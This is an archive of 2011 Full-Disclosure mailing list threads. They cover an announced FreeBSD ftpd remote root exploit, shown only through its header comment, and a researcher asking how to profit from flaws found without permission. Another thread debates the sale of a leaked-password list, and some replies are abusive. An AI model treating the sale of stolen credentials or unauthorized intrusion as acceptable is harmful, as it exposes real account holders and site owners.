On Wed, Nov 30, 2011 at 11:05:08PM +0100, HI-TECH . wrote: Hi lists, sorry if I offended anyone with by referring to teso, I really like teso as you might also. all this happend because I was drunk hehe : I hope you enjoy this release! Am 30. November 2011 20:32 schrieb HI-TECH . isowarez.isowarez.isowa...@googlemail.com: /* KCOPE2011 - x86/amd64 bsd ftpd remote root exploit ?* ?* KINGCOPE CONFIDENTIAL - SOURCE MATERIALS ?* ?* This is unpublished proprietary source code of KINGCOPE Security. ?* ?* (C) COPYRIGHT KINGCOPE Security, 2011 ?* All Rights Reserved ?* ?* ?* bug found by Kingcope ?* thanks to noone except alex whose damn down ?* ?* tested against: ?FreeBSD-8.2,8.1,7.2,7.1 i386; ?* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?FreeBSD-6.3 i386 ?* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?FreeBSD-5.5,5.2 i386 ?* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?FreeBSD-8.2 amd64 ?* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?FreeBSD-7.3, 7.0 amd64 ?* ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?FreeBSD-6.4, 6.2 amd64 ?* ?*/ I m better than TESO 7350 see attached. I aint mad at cha and dont forget that the scene is fucked. and that the public scene is fucked too, kind of. youse a down ass bitch and I aint mad at cha. thanks lsd you are the only one NORMAL. hear the track before you see the code: http://www.youtube.com/watch?v=krxu9_dRUwQ BTW my box (isowarez.de) got hacked so expect me in a zine : /Signed the awesome Kingcope Fun stuff... Thanks ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
Hi, No offence, I think you have a wrong perception with these companies, They are not into Zero day !!! They are just vendor specific support companies. you cannot expect an vendor specific support company to find Zero day and handle operations support both at same time. Sorry buddy that aint possible. I am working with the one you have mentioned what ever Vulnerability we identify are either for our vendors and we are not allowed by contractual agreement to published identified vulnerabilities to public domain. secondly If I am identifying some Zero day why would I share it on behalf of the company name . Hope this clears your doubt about security basics. thanks, On Thu, Dec 1, 2011 at 7:24 AM, Wonder Guy blrwonder...@gmail.com wrote: Hi Security Experts, I have a question about the security track record of Indian IT vendors like Infosys, TCS, Wipro etc. An article about Indian IT vendors by an ex-employee of one of these companies is circulating in the different NITs (National Institute of Technology) of India today. My doubt is about this part of the article from http://susam.in/blog/re-infosys-tcs-or-wipro/#engineers http://susam.in/blog/re-infosys-tcs-or-wipro/#engineers : Many claimed that I am wrong about the poor standard of training in Infosys, TCS, or Wipro. I must tell them that I have attended some of these training programmes. Among the many horror stories pertaining to training in these companies, I'll share only one with you to make my point. In the training assessments, the instructors set question papers containing problems with code that invokes undefined behaviour and ask you to predict its output. 'It Invokes undefined behaviour' is not provided as an option you can select as the correct answer. Such training and knowledge is not only inaccurate but also very dangerous if you care about robustness and security of the software you create. I am trying to verify this by using Secunia. I can find plenty of Microsoft and Google security vulnerabilities [ http://secunia.com/advisories/search/?search=Microsoft+Google http://secunia.com/advisories/search/?search=Microsoft+Google%C2%A0] but none for Infosys TCS or Wipro [ http://secunia.com/advisories/search/?search=Infosys+TCS+Wipro http://secunia.com/advisories/search/?search=Infosys+TCS+Wipro%C2%A0]. What is the matter here? Indian software vendors are the best in the whole world in security matters or Secunia simply doesn't care about Indian software vendors? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Client aproach
It was my first thought letting them know in anon e-mail but getting some extra cash would be great too. I guess i will stick with sending the e-mail alerting them of the situation. thanks A 2011/12/01, às 16:55, Thor (Hammer of God) escreveu: You are in a tough spot. In general, the level of access you granted yourself in an unauthorized testing of the site would be considered illegal. You may recall the whole 'or 1=1 thing. So your approach to the client is all he would need to contact authorities if he so chose. Arguably, the best thing to do here would be to contact the owner and just give them the information for free, and do so in a way that does not implicate you in any wrongdoing. Or simply drop it. Moving forward, you might want to consider changing your business model so that you are hired to perform web app assessments before you start breaking laws. t -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Miguel Lopes Sent: Wednesday, November 30, 2011 2:56 AM To: full-disclosure@lists.grok.org.uk Subject: [Full-disclosure] Client aproach Hi List, I found some major design flaws and vulnerabilities on a local webstore, but now i would like to tell the owner nicely and maybe profit from it?! Does anyone have some tips on how to inform a potential client of their vulnerabilities? Thanks in advance, Miguel Lopes ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Client aproach
Thanks for the advice, the money was a long shot i will stick with the anonymous e-mail, giving the information and tips to fix it. A 2011/12/01, às 18:08, Chris L escreveu: Depending on your country/local laws (no idea where you're from), how you discovered the vulnerabilities and if you actually tested them and gained unauthorized access in the process then there is the possibility you're on the wrong side of the law. If you haplessly stumbled across it and then left it be but just know its there, you're probably safe. If you found something that seemed odd, and actively tried to test it or to verify that it was an issue without prior permission, you're almost certainly in violation of some law. Even if it was very minor verification. As well a lot of whether or not the owner decides to get police involved and try to come after you is simply going to depend on their technological knowledge, how they perceive the information you tell them and simply whether or not they decide they like or not so its a real crap shoot. I'd say your chances of getting money are slim/nil and that it would be a bad idea to even attempt. Even if its not your intention, and even if you make it explicitly clear that you won't use the info or disseminate the info even if he decides not to pay you to fix it, it could still be perceived as an extortion attempt. As others have said, the best bet is to send an anonymous email, give him all the details and hope he takes proper action to fix it. If you really feel the need to let them know who you are, (or you did this from a location where they're going to track it back to you if they check the logs once you alert them of the problem anyway), I'd still say the best thing to do is to simply give them all the information and some small advice about how it may be fixed for free. There simply isn't any good way though to get actual money out of this though without it seeming like a shakedown/extortion or the owner simply getting cops involved because they don't even want to bother spending any money on the issues and would rather just label you some elite evil hacker and pretend their is nothing they can do rather than spend the money. However, if you're hellbent on it, the only relatively safe way I see to get anything of value out of this would be to turn over all information and advice on fixing the problem and make it clear you just want to alert them to the problem. A lot of people aren't exactly technical and won't understand what you're saying so you can offer to fix it, I can't stress this enough, for FREE. Then if by the end of fixing it they appreciate your work and think you've done well you could always ask if you can use them as a reference, which might help get actual paying work down the road. This is best done at the END and only if you feel that you've developed some trust and they appreciate the help you gave them. All that said though, safest way, as said, is simply an anonymous e-mail and it is the best option. If you are going to stick your neck out there, at least realize you're not likely to see any real money from it and there is the risk you get it chopped off. On Thu, Dec 1, 2011 at 9:04 AM, Peter Dawson slash...@gmail.com wrote: Send site owner/admin anon email and leave it at that.. as Thor mentioned give em the info for free! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Client aproach
Depending on your country/local laws (no idea where you're from), how you discovered the vulnerabilities and if you actually tested them and gained unauthorized access in the process then there is the possibility you're on the wrong side of the law. If you haplessly stumbled across it and then left it be but just know its there, you're probably safe. If you found something that seemed odd, and actively tried to test it or to verify that it was an issue without prior permission, you're almost certainly in violation of some law. Even if it was very minor verification. As well a lot of whether or not the owner decides to get police involved and try to come after you is simply going to depend on their technological knowledge, how they perceive the information you tell them and simply whether or not they decide they like or not so its a real crap shoot. I'd say your chances of getting money are slim/nil and that it would be a bad idea to even attempt. Even if its not your intention, and even if you make it explicitly clear that you won't use the info or disseminate the info even if he decides not to pay you to fix it, it could still be perceived as an extortion attempt. As others have said, the best bet is to send an anonymous email, give him all the details and hope he takes proper action to fix it. If you really feel the need to let them know who you are, (or you did this from a location where they're going to track it back to you if they check the logs once you alert them of the problem anyway), I'd still say the best thing to do is to simply give them all the information and some small advice about how it may be fixed for free. There simply isn't any good way though to get actual money out of this though without it seeming like a shakedown/extortion or the owner simply getting cops involved because they don't even want to bother spending any money on the issues and would rather just label you some elite evil hacker and pretend their is nothing they can do rather than spend the money. However, if you're hellbent on it, the only relatively safe way I see to get anything of value out of this would be to turn over all information and advice on fixing the problem and make it clear you just want to alert them to the problem. A lot of people aren't exactly technical and won't understand what you're saying so you can offer to fix it, I can't stress this enough, for FREE. Then if by the end of fixing it they appreciate your work and think you've done well you could always ask if you can use them as a reference, which might help get actual paying work down the road. This is best done at the END and only if you feel that you've developed some trust and they appreciate the help you gave them. All that said though, safest way, as said, is simply an anonymous e-mail and it is the best option. If you are going to stick your neck out there, at least realize you're not likely to see any real money from it and there is the risk you get it chopped off. On Thu, Dec 1, 2011 at 9:04 AM, Peter Dawson slash...@gmail.com wrote: Send site owner/admin anon email and leave it at that.. as Thor mentioned give em the info for free! ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Infosys TCS Wipro like companies don't know security basics?
On Thu, Dec 1, 2011 at 10:37 PM, TAS p0wnsa...@gmail.com wrote: Wonder guy, the basis of your conclusion are as ridiculous as your question. Microsoft and Google are products companies. Atleast TCS and Wipro are not. They are into offshore and managed business domains. Infosys is also into making custom solutions and they are all closed source. And none of the companies that you mentioned cater to the such a large audience as MS and Google do. Are you going to start looking for every single company in secunia and come up with such preposterous conclusions? Hi TAS, I never made any conclusions. I only asked a question and it was not a loaded question but a curious one. In case you missed it, here is the question once again: I am trying to verify this by using Secunia. I can find plenty of Microsoft and Google security vulnerabilities [ http://secunia.com/advisories/search/?search=Microsoft+Google ] but none for Infosys TCS or Wipro [ http://secunia.com/advisories/search/?search=Infosys+TCS+Wipro ]. What is the matter here? Indian software vendors are the best in the whole world in security matters or Secunia simply doesn't care about Indian software vendors? Thanks for the clarification that TCS and Wipro are not product companies. But I heard that Infosys makes banking products. But anyway, from all the replies to my email I am able to understand that Secunia is not listing vendors catering to small part of the software world. So that answers my question. Thanks TAS and everyone. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] FreeBSD ftpd ProFTPd on FreeBSD exploit in Action [HACKTRO] :
Hi lists, this is Kingcope btw this exploit does not depend on the ProFTPd version as illustrated in the youtube video below it will unlock ProFTPd 1.3.4a too. enjoy the hacktro!! http://youtu.be/10uedlgNEJA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] FreeBSD ftpd ProFTPd on FreeBSD exploit in Action [HACKTRO] :
Awesome stuff =) On 2 December 2011 09:17, HI-TECH . isowarez.isowarez.isowa...@googlemail.com wrote: Hi lists, this is Kingcope btw this exploit does not depend on the ProFTPd version as illustrated in the youtube video below it will unlock ProFTPd 1.3.4a too. enjoy the hacktro!! http://youtu.be/10uedlgNEJA ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] International Checkout
Hello, Read the email below if you want to laugh a little. Especially the answer to question 1 in the FAQ at the end of the email. No word on how they were pirated or how many credit card numbers were stolen though, but obviously I'm not the only who's received that email: http://forums.whirlpool.net.au/archive/1822778 Anyway, I guess it's alright, since the Security section of their privacy policy helpfully indicates that by using this web site, you acknowledge that the Internet is inherently insecure and that there is always a risk that your personally identifiable information could be intercepted or otherwise accessed and improperly used, which seems to be their way of saying that, whatever happens, it's just going to be the fault of the Internet, not theirs: http://www.internationalcheckout.com/privacy.php (and I guess We take commercially reasonable precautions to protect your personally identifiable information is just their way of saying they care about protecting my data only as long as it doesn't cost them too much to do so...) Bleh. Philippe From: International Checkout Customer Support informat...@internationalcheckout.com To: meun...@ccs.neu.edu Subject: Important Information Regarding Your Purchase at International Checkout Date: Wed, 30 Nov 2011 00:41:06 -0500 Dear Customer, You have made a purchase of Dr. Martens through International Checkout in the last 18 months and Dr. Martens has asked us to ensure you are advised of a recent security issue which took place with International Checkout's online system. International Checkout was recently the victim of a system intruder who was able to access encrypted credit card information. International Checkout has conducted a thorough investigation into the potential risks to our customers. You are receiving this email from International Checkout because your credit card information was in the database which was compromised. We have taken all necessary action to ensure our systems at International Checkout meet recommended and compliant security levels. We encourage you to carefully review your recent credit card statements to identify any unauthorized activity. If you find any unauthorized activity please contact your credit card issuer or bank immediately. You may also consider changing your credit card number if you are concerned for the security of your card details. International Checkout deeply regrets any inconvenience this will cause. For more information regarding the security issue please feel free to contact International Checkout by email to discuss this further at: informat...@internationalcheckout.com You can also contact International Checkout's Customer Service by phone on any of the following numbers between the hours of 6:30 a.m. and 6:30 p.m. PST: USA and Canada: +1.866.682.0641 USA Phone: +001.310.601.8196 UK Phone:+44.20.8133.2436 Australia Phone : +61.28003.4685 Denmark Phone : +45.369.50312 Sweden Phone :+46.4069.35779 Hong Kong Phone :+852.8175.6057 Japan Phone : +81.50553.46826 Finland Phone : +358.(02)3619.0437 Brazil Phone :+55.(11)3230.9539 Ireland Phone : +353.1443.3715 Mexico Phone : +52.558.421.8266 New Zealand Phone : +64.9889.0408 You can also find answers to questions you may have in the FAQs below. Sincerely, International Checkout Inc. ___ International Checkout Security Breach FAQ's November 29, 2011 Q1: What is this about? A1: International Checkout has been the victim of a recent security breach. In mid-September, 2011 we discovered that an intruder accessed and potentially compromised our system. We immediately commenced an investigation, notified law enforcement, purged credit card data from our databases to ensure no future vulnerability, and have consulted with both our processor and the credit card associations. Through this investigation, which was just completed on October 31, 2011, we learned that on August 23, 2011, an intruder gained access to part of our system that contained credit card numbers of customers. The credit card information in that database was encrypted, but we have learned that the intruder was able to access the encryption key that was stored separately. International Checkout has implemented all security enhancements recommended by the third party investigator to improve our system security. In addition, we have successfully moved our website to a new system t hat has stronger security measures in place. Q2: What is International Checkout doing? A2: As a precaution, International Checkout is providing notification to people whose information may have been in the database that was accessed so
[Full-disclosure] SANS AppSec 2012 CFP reminder
Hi everyone, It's been over a month since we first announced the CFP for the SANS AppSec Summit being held in Las Vegas, Nevada on April 30 - May 1, 2012. We've received a number of great submissions so far but there's only two months left until the deadline on February 1, 2012. If you'd like to speak please get your submission in as soon as possible. Hope to see you in Vegas! The theme for this conference is Application Security at Scale. Billions of records in the cloud. Millions of smart mobile devices. Millions of developers writing new code. Hundreds of apps in your enterprise. Untold numbers of existing bugs. Unknown numbers of sophisticated attackers exploiting your software. What cutting edge techniques are attackers using? How do large enterprises handle these problems at scale? And how do small companies manage it all with fewer resources? We invite you to submit presentations in the following areas: - Cloud Security - Mobile Security - Security in the SDLC - Secure Coding - Security Architecture - Securing Legacy Applications - Securing Open Source Frameworks - Program Development - Security Metrics - Security Testing - Penetration Testing - Cutting Edge Attacks - Cutting Edge Defense - Case Studies - Any topic related to Application Security Submission Deadline February 1, 2012 Submit papers via EasyChair (account required). Talks will be 50 minutes in length. https://www.easychair.org/conferences/?conf=sansappsec2012 For additional information please visit the conference web site or contact us via email. https://www.sans.org/appsec-2012/ callforpapers-app...@sans.org Please forward to anyone who might be interested in speaking. Thanks! The SANS AppSec 2012 Team ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help: - keep ongoing effort to improve the quality of the list over time - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free) - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger - reduce abuse On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote: On 12/1/11 6:14 PM, Addy Yeow wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) Anyone linking a warez version (Why pay $4.99?) ? -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
- reduce abuse The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts? I'm partly tempted to buy and post the list here just to spite you for being so idiotic. On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote: There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help: - keep ongoing effort to improve the quality of the list over time - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free) - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger - reduce abuse On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote: On 12/1/11 6:14 PM, Addy Yeow wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) Anyone linking a warez version (Why pay $4.99?) ? -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
Which country is UNIQPASS registered as a tm? On Fri, Dec 2, 2011 at 1:47 AM, adam a...@papsy.net wrote: - reduce abuse The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts? I'm partly tempted to buy and post the list here just to spite you for being so idiotic. On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote: There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help: - keep ongoing effort to improve the quality of the list over time - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free) - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger - reduce abuse On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote: On 12/1/11 6:14 PM, Addy Yeow wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) Anyone linking a warez version (Why pay $4.99?) ? -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
Also, not to beat a dead horse, but.. - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger Is also pretty ridiculous. Why? Because you're offering hashes.txthttp://dazzlepod.com/site_media/txt/hashes.txt , passwords.txt http://dazzlepod.com/site_media/txt/passwords.txt and uniqpass_preview.txthttp://dazzlepod.com/site_media/txt/uniqpass_preview.txt to the world: C:\Users\adam\Desktopls -la uniqpass_preview.txt | gawk {print $5} 19855177 C:\Users\adam\Desktopls -la passwords.txt | gawk {print $5} 17496649 C:\Users\adam\Desktopls -la hashes.txt | gawk {print $5} 22033538 C:\Users\adam\Desktopecho 19855177 + 17496649 + 22033538 | bc 59385364 In total, 56MB and you're offering them for free and uncompressed. C:\Users\adam\Desktopzip -9 combined.zip passwords.txt uniqpass_preview.txt hashes.txt adding: passwords.txt (164 bytes security) (deflated 60%) adding: uniqpass_preview.txt (164 bytes security) (deflated 38%) adding: hashes.txt (164 bytes security) (deflated 46%) C:\Users\adam\Desktopls -la combined.zip | gawk {print $5} 31337317 Meanwhile, if you were compressing them: they'd be almost half the size. But you're not, you don't even seem concerned with doing so, and you're going to pretend that 8MB is really making *that* big of a difference? If so, why are you wasting 27MB by offering those 3 files uncompressed? That doesn't really make much sense to me. On Thu, Dec 1, 2011 at 7:52 PM, Benji m...@b3nji.com wrote: Which country is UNIQPASS registered as a tm? On Fri, Dec 2, 2011 at 1:47 AM, adam a...@papsy.net wrote: - reduce abuse The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts? I'm partly tempted to buy and post the list here just to spite you for being so idiotic. On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote: There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help: - keep ongoing effort to improve the quality of the list over time - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free) - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger - reduce abuse On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote: On 12/1/11 6:14 PM, Addy Yeow wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) Anyone linking a warez version (Why pay $4.99?) ? -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
This is what whitehats would probably class as a 'blackhat' , the sad thing is, i bet NO blackhats, really like this.. not serious ones. Its sad, your a pathetic person, resorting to online theft, to cover your bs demands, as pointed out, what 'costs', for keeping, stolen data... ? ONLY the cost, You are, to the community. your called a bad scourge, and bad example of a hacker. I wish you and your website and service, are overthrown, your a fool, and, you suck. i hope feds are pulling you apart. amigo. go fk yourself, rot. your NO hacker, your 'wanker' go whack d1ck sum more. Bad sad kid with some sqli...well, sadly, you should NEVER post criinal activities, to a list like this, are you stupid or, just fucking REALLY STUPID?? Idiot You are NO blackhat,and NO hacker. xd On 2 December 2011 12:52, Benji m...@b3nji.com wrote: Which country is UNIQPASS registered as a tm? On Fri, Dec 2, 2011 at 1:47 AM, adam a...@papsy.net wrote: - reduce abuse The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts? I'm partly tempted to buy and post the list here just to spite you for being so idiotic. On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote: There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help: - keep ongoing effort to improve the quality of the list over time - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free) - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger - reduce abuse On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote: On 12/1/11 6:14 PM, Addy Yeow wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) Anyone linking a warez version (Why pay $4.99?) ? -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
22033538 whats this hash for nothin. hes a f00l. altho, i dont like you, atleast, you see a fool as i do. unfortunately, your not much better. On 2 December 2011 13:05, adam a...@papsy.net wrote: Also, not to beat a dead horse, but.. - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger Is also pretty ridiculous. Why? Because you're offering hashes.txt, passwords.txt and uniqpass_preview.txt to the world: C:\Users\adam\Desktopls -la uniqpass_preview.txt | gawk {print $5} 19855177 C:\Users\adam\Desktopls -la passwords.txt | gawk {print $5} 17496649 C:\Users\adam\Desktopls -la hashes.txt | gawk {print $5} 22033538 C:\Users\adam\Desktopecho 19855177 + 17496649 + 22033538 | bc 59385364 In total, 56MB and you're offering them for free and uncompressed. C:\Users\adam\Desktopzip -9 combined.zip passwords.txt uniqpass_preview.txt hashes.txt adding: passwords.txt (164 bytes security) (deflated 60%) adding: uniqpass_preview.txt (164 bytes security) (deflated 38%) adding: hashes.txt (164 bytes security) (deflated 46%) C:\Users\adam\Desktopls -la combined.zip | gawk {print $5} 31337317 Meanwhile, if you were compressing them: they'd be almost half the size. But you're not, you don't even seem concerned with doing so, and you're going to pretend that 8MB is really making that big of a difference? If so, why are you wasting 27MB by offering those 3 files uncompressed? That doesn't really make much sense to me. On Thu, Dec 1, 2011 at 7:52 PM, Benji m...@b3nji.com wrote: Which country is UNIQPASS registered as a tm? On Fri, Dec 2, 2011 at 1:47 AM, adam a...@papsy.net wrote: - reduce abuse The concerning part is that you're serious. Tell me, how does someone paying for a list of STOLEN passwords reduce abuse? This email, your obsession with LulzSec and the disclaimer on your site make it pretty clear where the information is coming from, so what kind of abuse potential does this have by someone not paying? And who are you to not only take credit, but also demand payment, for other peoples' efforts? I'm partly tempted to buy and post the list here just to spite you for being so idiotic. On Thu, Dec 1, 2011 at 7:16 PM, Addy Yeow ayeo...@gmail.com wrote: There are many password lists already available for free out in the wild but mostly lack the quality. The minimal fee for UNIQPASS is necessary to help: - keep ongoing effort to improve the quality of the list over time - ensure frequent updates, i.e. when new leaked databases appear (existing users of UNIQPASS get updated copy for free) - cover cost of upstream bandwidth, the list is currently at 64MB compressed and new versions are likely to only get larger - reduce abuse On Fri, Dec 2, 2011 at 1:33 AM, Fabio Pietrosanti (naif) li...@infosecurity.ch wrote: On 12/1/11 6:14 PM, Addy Yeow wrote: I thought some of you may find this large password list useful, over 27 million entries. http://dazzlepod.com/uniqpass/ (it's a paid list though, at $4.99) Anyone linking a warez version (Why pay $4.99?) ? -naif ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Large password list
